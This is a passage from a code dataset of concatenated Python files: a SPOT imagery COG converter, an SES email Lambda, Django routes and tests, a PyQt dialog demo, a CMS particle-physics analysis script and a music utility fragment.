first_user)\n self.assertIn('Андрій', response.content)\n self.assertIn('Мініх', response.content)\n self.assertIn('Студент, розробник', response.content)\n","sub_path":"apps/hello/tests/test_views_home.py","file_name":"test_views_home.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"219046662","text":"import os\nfrom tempfile import TemporaryDirectory\nimport pystac\nfrom pystac.extensions.eo import EOExtension\nfrom pystac.extensions.projection import ProjectionExtension\nfrom stactools.nrcan_spot_ortho.stac_templates import image_types\nfrom stactools.nrcan_spot_ortho.geobase_ftp import GeobaseSpotFTP\nfrom stactools.nrcan_spot_ortho.stac_templates import (spot_bands, spot_pan,\n proj_epsg)\nfrom stactools.nrcan_spot_ortho.utils import (CustomStacIO, download_from_ftp,\n call, get_existing_paths, unzip,\n upload_to_s3)\nfrom urllib.parse import urlparse\nimport rasterio\n\npystac.StacIO.set_default(CustomStacIO)\n\n\ndef cogify(input_path, output_path, overwrite, existing_cog_paths):\n \"\"\"COGify a geotiff at input_path to a cloud optimized geotiff at output_path.\n \"\"\"\n print(f\"COGifying {os.path.basename(input_path)}\")\n failure = False\n parsed = urlparse(output_path)\n\n if (not overwrite) and (output_path in existing_cog_paths):\n print(f\"Skipping {os.path.basename(output_path)}, already COGified.\")\n\n elif parsed.scheme == \"s3\":\n with TemporaryDirectory() as tmp_dir:\n tmp_path = os.path.join(tmp_dir, os.path.basename(output_path))\n failure = call([\n 'gdal_translate', '-of', 'COG', '-co', 'compress=deflate',\n input_path, tmp_path\n ])\n upload_to_s3(parsed, tmp_path)\n\n else:\n failure = call([\n 'gdal_translate', '-of', 'COG', '-co', 'compress=deflate',\n input_path, output_path\n ])\n\n if failure:\n print(f\"Could not COGify to {output_path}\")\n raise\n\n\ndef include_cog_asset(item, cog_path, cog_proj):\n \"\"\"Mutate a STAC item to include a COG at cog_path with the\n projection cog_proj as an asset.\n \"\"\"\n # Include the COG as an asset\n cog_filename = os.path.basename(cog_path)\n title = [v for k, v in image_types.items() if k in cog_filename][0]\n asset = pystac.Asset(href=cog_path,\n media_type=pystac.MediaType.COG,\n roles=['data'],\n title=title)\n\n # Provide band and projection information for the asset\n eo_ext = EOExtension.ext(asset)\n if title == \"pan\":\n eo_ext.apply([spot_pan[cog_filename[:2].upper()]])\n else:\n eo_ext.apply([spot_bands[title]])\n proj_ext = ProjectionExtension.ext(asset)\n proj_ext.epsg = proj_epsg[cog_proj]\n with rasterio.open(cog_path) as src:\n proj_ext.transform = src.transform\n proj_ext.bbox = src.bounds\n # proj_ext.projjson = src.crs.to_dict(proj_json=True)\n proj_ext.wkt2 = src.crs.wkt\n asset.properties['gsd'] = src.res[0]\n\n item.assets[title] = asset\n\n\ndef cogify_item(item,\n cog_directory,\n overwrite,\n existing_cog_paths,\n existing_tn_paths,\n cog_proj=\"lcc00\"):\n \"\"\"Create COGs from the GeoTIFF asset contained in the passed in STAC item.\n Mutates the item to include assets for the new COGs.\n\n Args:\n item (pystac.Item): Item that contains assets that will be converted to\n COGs.\n cog_directory (str): A URI of a directory to store COGs. This will be used\n in conjunction with the file names based on the COG asset to store\n the COG data. 
If None is passed then store COGs in the location given\n by the self_href of the item.\n overwrite (bool): Whether to overwrite existing COG files.\n existing_cog_paths (list): List of existing COG locations.\n existing_tn_paths (List): List of existing thumbnail locations.\n cog_proj (str): Imagery is stored in LCC projection as well as local UTM\n projections. Choose which of these projections to convert to COG (LCC\n recommended, as it covers all of Canada).\n \"\"\"\n if cog_directory is None:\n cog_directory = os.path.dirname(item.get_self_href())\n\n with TemporaryDirectory() as tmp_dir:\n # Get asset names associated with the chosen projection\n asset_names = [k for k in item.assets.keys() if cog_proj in k.lower()]\n\n for asset_name in asset_names:\n zip_href = item.assets[asset_name].href\n\n if not overwrite:\n # predict cog file names\n fname_base = os.path.basename(zip_href).replace(\n f\"_{cog_proj}.zip\", \"\")\n bands = range(1, 5) if fname_base[-3:] == \"m20\" else [1]\n cog_paths = [\n os.path.join(\n cog_directory,\n f\"{s}{fname_base[1:]}_{i}_{cog_proj}_cog.tif\")\n for i in bands for s in [\"s\", \"S\"]\n ]\n\n # check if predicted file names exist and include as asset if so\n exists = False\n for cog_path in cog_paths:\n if cog_path in existing_cog_paths:\n include_cog_asset(item, cog_path, cog_proj)\n exists = True\n\n # skip download/unzip/cogify if any exist (assume all done)\n if exists:\n print(f\"Skipping {asset_name}, already COGified.\")\n continue\n\n # Download zip file\n zip_path = os.path.join(tmp_dir, os.path.basename(zip_href))\n success = download_from_ftp(zip_href, zip_path, GeobaseSpotFTP())\n if not success:\n continue\n\n # Unzip images\n non_cog_paths = [\n f for f in unzip(zip_path, tmp_dir) if '.tif' in f.lower()\n ]\n\n # For each image, COGify and include as an asset\n for non_cog_path in non_cog_paths:\n # COGify\n cog_filename = (os.path.basename(non_cog_path).replace(\n '.tif', '_cog.tif'))\n cog_path = os.path.join(cog_directory, cog_filename)\n cogify(non_cog_path, cog_path, overwrite, existing_cog_paths)\n include_cog_asset(item, cog_path, cog_proj)\n\n # Download the thumbnail to the same location as the COGs, checking\n # if already downloaded first\n tn_href = item.assets[\"thumbnail\"].href\n if cog_directory not in tn_href:\n tn_fname = os.path.basename(tn_href)\n tn_path = os.path.join(cog_directory, tn_fname)\n parsed = urlparse(tn_path)\n\n success = False\n if tn_path not in existing_tn_paths:\n if (parsed.scheme == \"s3\"):\n tmp_tn_path = os.path.join(tmp_dir, tn_fname)\n success = download_from_ftp(tn_href, tmp_tn_path,\n GeobaseSpotFTP())\n if success:\n upload_to_s3(parsed, tmp_tn_path)\n\n else:\n success = download_from_ftp(tn_href, tn_path,\n GeobaseSpotFTP())\n\n if success:\n item.assets[\"thumbnail\"].href = tn_path\n\n\ndef cogify_catalog(catalog_path, cog_directory=None, overwrite=False):\n \"\"\"Crawl a catalog, find zipped imagery hrefs within items, download/unzip/COGify\n these, include the results as new assets.\n\n Args:\n catalog_path (str): The file path of the root STAC catalog.\n cog_directory (str): A URI of a directory to store COGs. This will be used\n in conjunction with the file names based on the COG asset to store\n the COG data. 
If None is passed then store COGs in the location given\n by the self_href of the item.\n overwrite (bool): Whether to overwrite existing COG files.\n \"\"\"\n # Open catalog\n spot_catalog = pystac.read_file(catalog_path)\n\n # Read cog_directory contents to speed up checks for existing files\n check_dir = cog_directory if cog_directory else os.path.dirname(\n catalog_path)\n print(f\"Getting contents of {check_dir}...\")\n existing_cog_paths = get_existing_paths(check_dir, ending=\"_cog.tif\")\n existing_tn_paths = get_existing_paths(check_dir, ending=\"_tn.jpg\")\n\n count = 0\n for _, _, items in spot_catalog.walk():\n\n for item in items:\n count += 1\n print(f\"\\n{item.id}... {count}\")\n\n # Skip if COGified already and overwrite==False\n cogified = (\"B1\" in item.assets.keys()) and (item.assets[\"B1\"].href\n in existing_cog_paths)\n\n # cogified = \"B1\" in item.assets.keys()\n if (not cogified) or (cogified and overwrite):\n\n # COGify item's assets and save item\n cogify_item(item, cog_directory, overwrite, existing_cog_paths,\n existing_tn_paths)\n # spot_catalog.normalize_and_save(os.path.dirname(catalog_path),\n # spot_catalog.catalog_type)\n item.save_object()\n\n else:\n print(f\"Skipping {item.id}, already COGified.\")\n","sub_path":"src/stactools/nrcan_spot_ortho/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"493572076","text":"import os\nimport boto3\nfrom dotenv import load_dotenv\nfrom integrations.api import PokemonApi\nfrom requests.exceptions import HTTPError\nload_dotenv()\n\n\nSOURCE = os.getenv('SOURCE_EMAIL')\nSUBJECT = 'Informações sobre pokemons'\n\n\ndef validate_body(body):\n if 'pokemon_type' not in body:\n raise Exception('Missing pokemon_type parameter.')\n if 'destination' not in body:\n raise Exception('Missing destination parameter.')\n if (\n not isinstance(body['pokemon_type'], str) or\n not (\n isinstance(body['destination'], str) or\n isinstance(body['destination'], list)\n )\n ):\n raise Exception('Invalid JSON.')\n\n return body\n\n\ndef send_email(event, context):\n body = validate_body(event['body'])\n pokemon_type = body['pokemon_type']\n destination = body['destination']\n\n if isinstance(destination, str):\n destination = [destination]\n\n try:\n urls = PokemonApi().get_urls_by_type(pokemon_type)\n pokemons_info = PokemonApi().get_pokemons_info(urls)\n\n content = ''\n for info in pokemons_info:\n content += f''\n content += f'
Nome do pokemon: {info[\"name\"]}<br>'\n content += f'Peso: {info[\"weight\"]} kg<br>'\n content += f'Altura: {info[\"height\"]} m<br>'\n content += f'Experiência base: {info[\"base_experience\"]}<br>'\n\n TEMPLATE = f\"\"\"\n <html>\n <body>\n <p>Olá Treinador Pokemon,</p>\n <p>Aqui estão as informações de 5 pokémons aleatórios do\n tipo {pokemon_type} que podem ser interessantes para você\n capturar durante a sua jornada.</p>\n {content}\n <p>Gotta Catch 'Em All!</p>\n <p>See ya!</p>\n </body>\n </html>
    \n \n \n \"\"\"\n\n client = boto3.client('ses')\n\n response = client.send_email(\n Destination={\n 'ToAddresses': destination\n },\n Message={\n 'Body': {\n 'Html': {\n 'Charset': 'UTF-8',\n 'Data': TEMPLATE,\n }\n },\n 'Subject': {\n 'Charset': 'UTF-8',\n 'Data': SUBJECT,\n },\n },\n Source=SOURCE,\n )\n\n return response\n except Exception as e:\n if isinstance(e, HTTPError):\n raise Exception('Resource not found.')\n raise Exception('Internal Error.')\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"37576202","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/19 11:11\n# @Author : Wei\n# @Email : 592190443@qq.com\n# @File : urls.py\n# @Software: PyCharm\nfrom django.urls import path,re_path\n\n\nfrom .views import OrgView,UserAskView,OrgHomeView,OrgCourseView,OrgTeacherView,OrgDescView,AddFavView,TeacherListView,TeacherDetail\n\n\napp_name = \"organization\"\nurlpatterns = [\n\n # 课程组织结构\n path('list/', OrgView.as_view(),name='org_list'), #组织结构首页\n\n path('user_ask/',UserAskView.as_view(),name='user_ask'), #用户咨询ajax请求处理\n\n re_path('^home/(?P\\d+)$', OrgHomeView.as_view(), name=\"org_home\"), #处理从机构列表页到机构主页的url\n\n re_path('^course/(?P\\d+)$', OrgCourseView.as_view(), name=\"org_course\"), #机构主页到课程页\n\n re_path('teacher/(?P\\d+)$', OrgTeacherView.as_view(), name=\"org_teacher\"), #机构主页到老师详情页\n\n re_path('^desc/(?P\\d+)$', OrgDescView.as_view(), name=\"org_desc\"), #机构主页到机构详情页\n\n path('add_fav/',AddFavView.as_view(),name = \"add_fav\"), #处理点赞ajax请求\n\n #讲师\n path('teacher/list/', TeacherListView.as_view(), name=\"teacher_list\"), # 讲师列表页\n re_path('teacher/detail/(?P\\d+)$', TeacherDetail.as_view(), name=\"teacher_detail\"), # 讲师详情页\n\n\n\n]","sub_path":"mymooc/apps/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"609756265","text":"balance = 42\nannualInterestRate = .2\nmonthlyPaymentRate = .04\n\nmonthlyInterestRate = annualInterestRate/12.0\nminimumPayment = monthlyPaymentRate*balance\n\nfor i in range(0,12):\n balance -= monthlyPaymentRate*balance\n balance += balance*monthlyInterestRate\n\nprint(\"Month \"+str(i)+ \" remaining balance: \"+str(round(balance,2)))\n","sub_path":"Scratchpad/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"75898157","text":"import unittest\nfrom unittest.mock import patch\n\nfrom daemonsan.util import dynamo\nfrom daemonsan.model import team\n\n\nclass TestTeam(unittest.TestCase):\n def test_get(self):\n mock_ret = {\n 'Item': {\n 'team_id': {'S': 'abc1234'},\n 'team_name': {'S': 'the_team'},\n 'oauth_token': {'S': 'xyzw-1234abc'}\n }\n }\n with patch.object(dynamo.dynamodb, 'get_item', return_value=mock_ret):\n t = team.get('abc1234')\n dynamo.dynamodb.get_item.assert_called_with(\n TableName=team.Team.TABLE_NAME,\n Key={'team_id': {'S': 'abc1234'}})\n self.assertEqual(t.team_id, 'abc1234')\n self.assertEqual(t.team_name, 'the_team')\n self.assertEqual(t.oauth_token, 'xyzw-1234abc')\n\n def test_put(self):\n with patch.object(dynamo.dynamodb, 'put_item'):\n team.put('abc1234', 'the_team', 'xyzw-1234abc')\n dynamo.dynamodb.put_item.assert_called_with(\n TableName=team.Team.TABLE_NAME,\n Item={\n 'team_id': {'S': 'abc1234'},\n 
'team_name': {'S': 'the_team'},\n 'oauth_token': {'S': 'xyzw-1234abc'}\n })\n","sub_path":"test/model/test_team.py","file_name":"test_team.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"234171593","text":"import sys\nfrom PyQt5.QtWidgets import *\n\n\nclass DlgMain(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Input Dialog\")\n self.resize(300, 300)\n\n self.btn = QPushButton(\"Enter name\", self)\n self.btn.move(50, 50)\n self.btn.clicked.connect(self.evt_btn_clicked)\n\n self.btn_age = QPushButton(\"Enter your age\", self)\n self.btn_age.move(50, 80)\n self.btn_age.clicked.connect(self.evt_btn_age_clicked)\n\n self.btn_cost_coffee = QPushButton(\"Enter coffe price\", self)\n self.btn_cost_coffee.move(50, 110)\n self.btn_cost_coffee.clicked.connect(self.evt_btn_cost_coffee_clicked)\n\n self.btn_color = QPushButton(\"Pick your color\", self)\n self.btn_color.move(50, 140)\n self.btn_color.clicked.connect(self.evt_btn_color_clicked)\n\n def evt_btn_color_clicked(self):\n lstColor = [\"Red\", \"Green\", \"Blue\"]\n sColor, bOk = QInputDialog.getItem(self, \"Color\", \"Pick your favorit color\", lstColor, editable=False)\n if bOk:\n QMessageBox.information(self, \"Color\", \"Your favorit color is \" + sColor)\n else:\n QMessageBox.critical(self, \"Text\", \"You did pick color\")\n return\n\n def evt_btn_cost_coffee_clicked(self):\n sCoffe, bOk = QInputDialog.getDouble(self, \"Price\", \"Please enter coffe price\", 2.00, 0.10, 10.00, 2)\n if bOk:\n if sCoffe <= 5:\n QMessageBox.information(self, \"Coffe price\", \"You paid your coffe \" + str(sCoffe))\n if sCoffe > 5 :\n QMessageBox.question(self, \"Price\", \"You realy paid {0} for the fu** coffe\".format(sCoffe))\n res = QMessageBox.question(self, \"Realy?\", \"No Realy you paid your coffe {0}\".format(sCoffe))\n if res == QMessageBox.Yes:\n QMessageBox.critical(self, \"Idiote\", \"Ti stvarno nisi normalan\")\n else:\n QMessageBox.information(self, \"Sala?\", \"dobro je nisi puko\")\n else:\n QMessageBox.information(self, \"\", \"User canceled\")\n\n\n \n def evt_btn_age_clicked(self):\n sAge, bOk = QInputDialog.getInt(self, \"Age\", \"Please enter your age\", 18, 18, 65, 1)\n if bOk:\n QMessageBox.information(self, \"Age\", \"Your age is \" + str(sAge))\n else:\n QMessageBox.critical(self, \"Error\", \"You did not entered your age\")\n\n\n def evt_btn_clicked(self):\n sName, bOk = QInputDialog.getText(self, \"Text\", \"Enter your name:\")\n if bOk:\n QMessageBox.information(self, \"Name\", \"Your name is \" + sName)\n else:\n QMessageBox.critical(self, \"Text\", \"You did not entered your name\")\n return\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n dlgMain = DlgMain()\n dlgMain.show()\n sys.exit(app.exec_())\n","sub_path":"20_QInputDialog.py","file_name":"20_QInputDialog.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"433799331","text":"import math\nimport copy\n\ndef deltaR2( e1, p1, e2=None, p2=None):\n \"\"\"Take either 4 arguments (eta,phi, eta,phi) or two objects that have 'eta', 'phi' methods)\"\"\"\n if (e2 == None and p2 == None):\n return deltaR2(e1.eta(),e1.phi(), p1.eta(), p1.phi())\n de = e1 - e2\n dp = deltaPhi(p1, p2)\n return de*de + dp*dp\n\ndef deltaPhi( p1, p2):\n '''Computes delta phi, handling periodic limit conditions.'''\n res = p1 - p2\n while res > math.pi:\n res 
-= 2*math.pi\n while res < -math.pi:\n res += 2*math.pi\n return res\n\n# import ROOT in batch mode\nimport sys\noldargv = sys.argv[:]\nsys.argv = [ '-b-' ]\nimport ROOT\nROOT.gROOT.SetBatch(True)\nsys.argv = oldargv\n\nfrom ctypes import c_uint8\n\n# load FWLite C++ libraries\nROOT.gSystem.Load(\"libFWCoreFWLite.so\")\nROOT.gSystem.Load(\"libDataFormatsFWLite.so\")\nROOT.AutoLibraryLoader.enable()\n\n# Create histograms, etc.\nROOT.gROOT.SetStyle('Plain') # white background\nH_ElectronEta = ROOT.TH1F (\"ElectronEta\",\"ElectronEta\",60,-3.,+3.)\nH_ElectronEta_Fake = ROOT.TH1F (\"ElectronEta_Fake\",\"ElectronEta_Fake\",60,-3.,+3.)\n\n# load FWlite python libraries\nfrom DataFormats.FWLite import Handle, Events\n\ngenpars, genParLabel = Handle(\"std::vector\"), \"prunedGenParticles\"\npgenpars, pgenParLabel = Handle(\"std::vector\"), \"packedGenParticles\"\nmuons, muonLabel = Handle(\"std::vector\"), \"slimmedMuons\"\nelectrons, electronLabel = Handle(\"std::vector\"), \"slimmedElectrons\"\nphotons, photonLabel = Handle(\"std::vector\"), \"slimmedPhotons\"\ntaus, tauLabel = Handle(\"std::vector\"), \"slimmedTaus\"\njets, jetLabel = Handle(\"std::vector\"), \"slimmedJets\"\nfatjets, fatjetLabel = Handle(\"std::vector\"), \"slimmedJetsAK8\"\nmets, metLabel = Handle(\"std::vector\"), \"slimmedMETs\"\nvertices, vertexLabel = Handle(\"std::vector\"), \"offlineSlimmedPrimaryVertices\"\npfcands, pfcandLabel = Handle(\"std::vector\"), \"packedPFCandidates\"\n\nverticesScore = Handle(\"edm::ValueMap\")\n\n# open file (you can use 'edmFileUtil -d /store/whatever.root' to get the physical file name)\n#events = Events('file:step4_inMINIAODSIM.root')\n#events = Events('file:/cms/data/store/user/hatake/RelValQCD_FlatPt_15_3000HS_14/pfvalidation/200906_033704/0000/step3_inMINIAODSIM_1.root')\n#events = Events('file:/cms/data/store/user/hatake/RelValQCD_FlatPt_15_3000HS_14/pfvalidation/200905_204656/0000/step3_inMINIAODSIM_1.root')\n# test\n#\nlistFiles=[\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_1.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_2.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_3.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_5.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_6.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_7.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_8.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_9.root'\n]\n# ref\n# listFiles=[\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_1.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_2.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_3.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_5.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_6.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_7.root',\n# 
'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_8.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_9.root'\n# ]\nevents = Events(listFiles)\n#events = Events('step3_inMINIAODSIM_rerereco_all.root')\n\nfor iev,event in enumerate(events):\n #if iev >= 100: break \n event.getByLabel(genParLabel, genpars)\n event.getByLabel(pgenParLabel, pgenpars)\n event.getByLabel(muonLabel, muons)\n event.getByLabel(electronLabel, electrons)\n event.getByLabel(photonLabel, photons)\n event.getByLabel(tauLabel, taus)\n event.getByLabel(jetLabel, jets)\n event.getByLabel(fatjetLabel, fatjets)\n event.getByLabel(metLabel, mets)\n event.getByLabel(vertexLabel, vertices)\n event.getByLabel(vertexLabel, verticesScore)\n event.getByLabel(pfcandLabel,pfcands)\n print(\"\\nEvent: run %6d, lumi %4d, event %12d\" % (event.eventAuxiliary().run(), event.eventAuxiliary().luminosityBlock(),event.eventAuxiliary().event()))\n\n # Vertices \n if len(vertices.product()) == 0 or vertices.product()[0].ndof() < 4:\n print(\"Event has no good primary vertex.\")\n continue\n else:\n PV = vertices.product()[0]\n print(\"PV at x,y,z = run %6d, event %10d, %+15.13f, %+15.13f, %+16.13f, ndof: %.1f, score: (pt2 of clustered objects) %.11f\" % (event.eventAuxiliary().run(), event.eventAuxiliary().event(), PV.x(), PV.y(), PV.z(), PV.ndof(),verticesScore.product().get(0)))\n\n # GenParticles\n for i,genp in enumerate(genpars.product()): \n if genp.pt() < 5 : continue\n print(\"genpar: run %6d, event %10d, pt %4.1f, eta %5.2f, phi %5.2f, pdgId %d.\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), genp.pt(), genp.eta(), genp.phi(), genp.pdgId()))\n\n # PackedGenParticles\n for i,pgenp in enumerate(pgenpars.product()): \n if pgenp.pt() < 5 : continue\n print(\"pgenpar: run %6d, event %10d, pt %4.1f, eta %5.2f, phi %5.2f, pdgId %d.\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), pgenp.pt(), pgenp.eta(), pgenp.phi(), pgenp.pdgId()))\n\n # Muons\n for i,mu in enumerate(muons.product()): \n if mu.pt() < 5 or not mu.isLooseMuon(): continue\n print(\"muon: run %6d, event %10d, pt %4.1f, dz(PV) %+5.3f, POG loose id %d, tight id %d.\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), mu.pt(), mu.muonBestTrack().dz(PV.position()), mu.isLooseMuon(), mu.isTightMuon(PV)))\n\n # Electrons\n for i,el in enumerate(electrons.product()):\n if el.pt() < 5: continue\n print(\"elec: run %6d, event %10d, pt %6.2f, supercluster eta %+5.3f, phi %+5.3f, energy %5.2f (raw %5.2f), gsf pt %+5.2f sigmaIetaIeta %.3f (%.3f with full5x5 shower shapes), lost hits %d, pass conv veto %d\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), el.pt(), el.superCluster().eta(), el.superCluster().phi(), el.superCluster().correctedEnergy(), el.superCluster().energy(), el.gsfTrack().pt(), el.sigmaIetaIeta(), el.full5x5_sigmaIetaIeta(), el.gsfTrack().hitPattern().numberOfLostHits(ROOT.reco.HitPattern.MISSING_INNER_HITS), el.passConversionVeto()))\n match = False\n for i,genp in enumerate(genpars.product()):\n if abs(genp.pdgId()) == 11:\n if deltaR2(genp,el)<0.01:\n genmatch = genp\n match = True\n if match :\n H_ElectronEta.Fill(el.eta())\n else :\n H_ElectronEta_Fake.Fill(el.eta())\n \n # Photon\n for i,pho in enumerate(photons.product()):\n if pho.pt() < 20 or pho.chargedHadronIso()/pho.pt() > 0.3: continue\n print(\"phot: run %6d, event %10d, pt %4.1f, supercluster eta %+5.3f, sigmaIetaIeta %.3f 
(%.3f with full5x5 shower shapes)\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), pho.pt(), pho.superCluster().eta(), pho.sigmaIetaIeta(), pho.full5x5_sigmaIetaIeta()))\n\n # Tau\n for i,tau in enumerate(taus.product()):\n if tau.pt() < 20: continue\n print(\"tau: run %6d, event %10d, pt %4.1f, dxy signif %.1f, ID(byMediumCombinedIsolationDeltaBetaCorr3Hits) %.1f, lead candidate pt %.1f, pdgId %d \" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), tau.pt(), tau.dxy_Sig(), tau.tauID(\"byMediumCombinedIsolationDeltaBetaCorr3Hits\"), tau.leadCand().pt(), tau.leadCand().pdgId()))\n\n # Jets (standard AK4)\n for i,j in enumerate(jets.product()):\n if j.pt() < 20: continue\n print(\"jet: run %6d, event %10d, pt %5.1f (raw pt %5.1f, matched-calojet pt %5.1f), eta %+4.2f, btag run1(CSV) ) %.3f, run2(pfCSVIVFV2) %.3f, pileup mva disc %+.2f\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), j.pt(), j.pt()*j.jecFactor('Uncorrected'), j.userFloat(\"caloJetMap:pt\"), j.eta(), max(0,j.bDiscriminator(\"combinedSecondaryVertexBJetTags\")), max(0,j.bDiscriminator(\"pfCombinedInclusiveSecondaryVertexV2BJetTags\")), j.userFloat(\"pileupJetId:fullDiscriminant\")))\n # if i == 0: # for the first jet, let's print the leading constituents\n # constituents = [ j.daughter(i2) for i2 in xrange(j.numberOfDaughters()) ]\n # constituents.sort(key = lambda c:c.pt(), reverse=True)\n # for i2, cand in enumerate(constituents):\n # if i2 > 4: \n # print \" .....\"\n # break\n # print \" constituent %3d: pt %6.2f, dz(pv) %+.3f, pdgId %+3d\" % (i2,cand.pt(),cand.dz(PV.position()),cand.pdgId()) \n\n # pfcands\n for i,j in enumerate(pfcands.product()):\n if j.pt() < 0: continue\n print(\"pfcands: run %6d, event %10d, pt %5.1f eta %5.2f pdgId %5d %5.3f %5.3f \" % ( event.eventAuxiliary().run(), event.eventAuxiliary().event(), j.pt(), j.eta(), j.pdgId(), j.rawCaloFraction(), j.rawHcalFraction()))\n\n # Fat AK8 Jets\n # for i,j in enumerate(fatjets.product()):\n # print \"jetAK8 %3d: pt %5.1f (raw pt %5.1f), eta %+4.2f, mass %5.1f ungroomed, %5.1f softdrop, %5.1f pruned, %5.1f trimmed, %5.1f filtered. CMS TopTagger %.1f\" % (\n # i, j.pt(), j.pt()*j.jecFactor('Uncorrected'), j.eta(), j.mass(), j.userFloat('ak8PFJetsCHSSoftDropMass'), j.userFloat('ak8PFJetsCHSPrunedMass'), j.userFloat('ak8PFJetsCHSTrimmedMass'), j.userFloat('ak8PFJetsCHSFilteredMass'), j.userFloat(\"cmsTopTagPFJetsCHSMassAK8\"))\n\n # # To get the constituents of the AK8 jets, you have to loop over all of the\n # # daughters recursively. 
To save space, the first two constituents are actually\n # # the Soft Drop SUBJETS, which will then point to their daughters.\n # # The remaining constituents are those constituents removed by soft drop but\n # # still in the AK8 jet.\n # constituents = []\n # for ida in xrange( j.numberOfDaughters() ) :\n # cand = j.daughter(ida)\n # if cand.numberOfDaughters() == 0 :\n # constituents.append( cand )\n # else :\n # for jda in xrange( cand.numberOfDaughters() ) :\n # cand2 = cand.daughter(jda)\n # constituents.append( cand2 )\n # constituents.sort(key = lambda c:c.pt(), reverse=True)\n # for i2, cand in enumerate(constituents):\n # if i2 > 4: \n # print \" .....\"\n # break\n # print \" constituent %3d: pt %6.2f, pdgId %+3d, #dau %+3d\" % (i2,cand.pt(),cand.pdgId(), cand.numberOfDaughters()) \n \n # wSubjets = j.subjets('SoftDrop') \n # for iw,wsub in enumerate( wSubjets ) :\n # print \" w subjet %3d: pt %5.1f (raw pt %5.1f), eta %+4.2f, mass %5.1f \" % (\n # iw, wsub.pt(), wsub.pt()*wsub.jecFactor('Uncorrected'), wsub.eta(), wsub.mass()\n # )\n # tSubjets = j.subjets('CMSTopTag')\n # for it,tsub in enumerate( tSubjets ) :\n # print \" t subjet %3d: pt %5.1f (raw pt %5.1f), eta %+4.2f, mass %5.1f \" % (\n # it, tsub.pt(), tsub.pt()*tsub.jecFactor('Uncorrected'), tsub.eta(), tsub.mass()\n # )\n\nf = ROOT.TFile.Open(\"myfile.root\",\"RECREATE\")\nH_ElectronEta.Write()\nH_ElectronEta_Fake.Write()\n#ROOT.TFile.Close(f)\nf.Write()\nf.Close()\n","sub_path":"FWLite/python/run_miniaod_plots.py","file_name":"run_miniaod_plots.py","file_ext":"py","file_size_in_byte":12521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"465608405","text":"class MelopyGenericError(Exception): pass\nclass MelopyValueError(ValueError): pass\n\nfrom utility import key_from_note, note_from_key\n\ndef bReturn(output, Type):\n \"\"\"Returns a selected output assuming input is a list\"\"\"\n if isinstance(output, list):\n if Type.lower() == \"list\":\n return output\n elif Type.lower() == \"tuple\":\n return tuple([i for i in output])\n elif Type.lower() == \"dict\":\n O = {}\n for i in range(len(output)):\n O[i] = output[i]\n return O\n elif Type.lower() == \"string\":\n return ','.join(output)\n elif Type.lower() == \"stringspace\":\n return ' '.join(output)\n else:\n raise MelopyGenericError(\"Unknown type: \" + Type)\n else:\n raise MelopyGenericError(\"Input to bReturn is not a list! Input: \" + str(output))\n\ndef iterate(start, pattern, rType=\"list\"):\n \"\"\"Iterates over a pattern starting at a given note\"\"\"\n start_key = key_from_note(start)\n ret = [start_key]\n for step in pattern:\n ret.append(ret[-1] + step)\n ret = 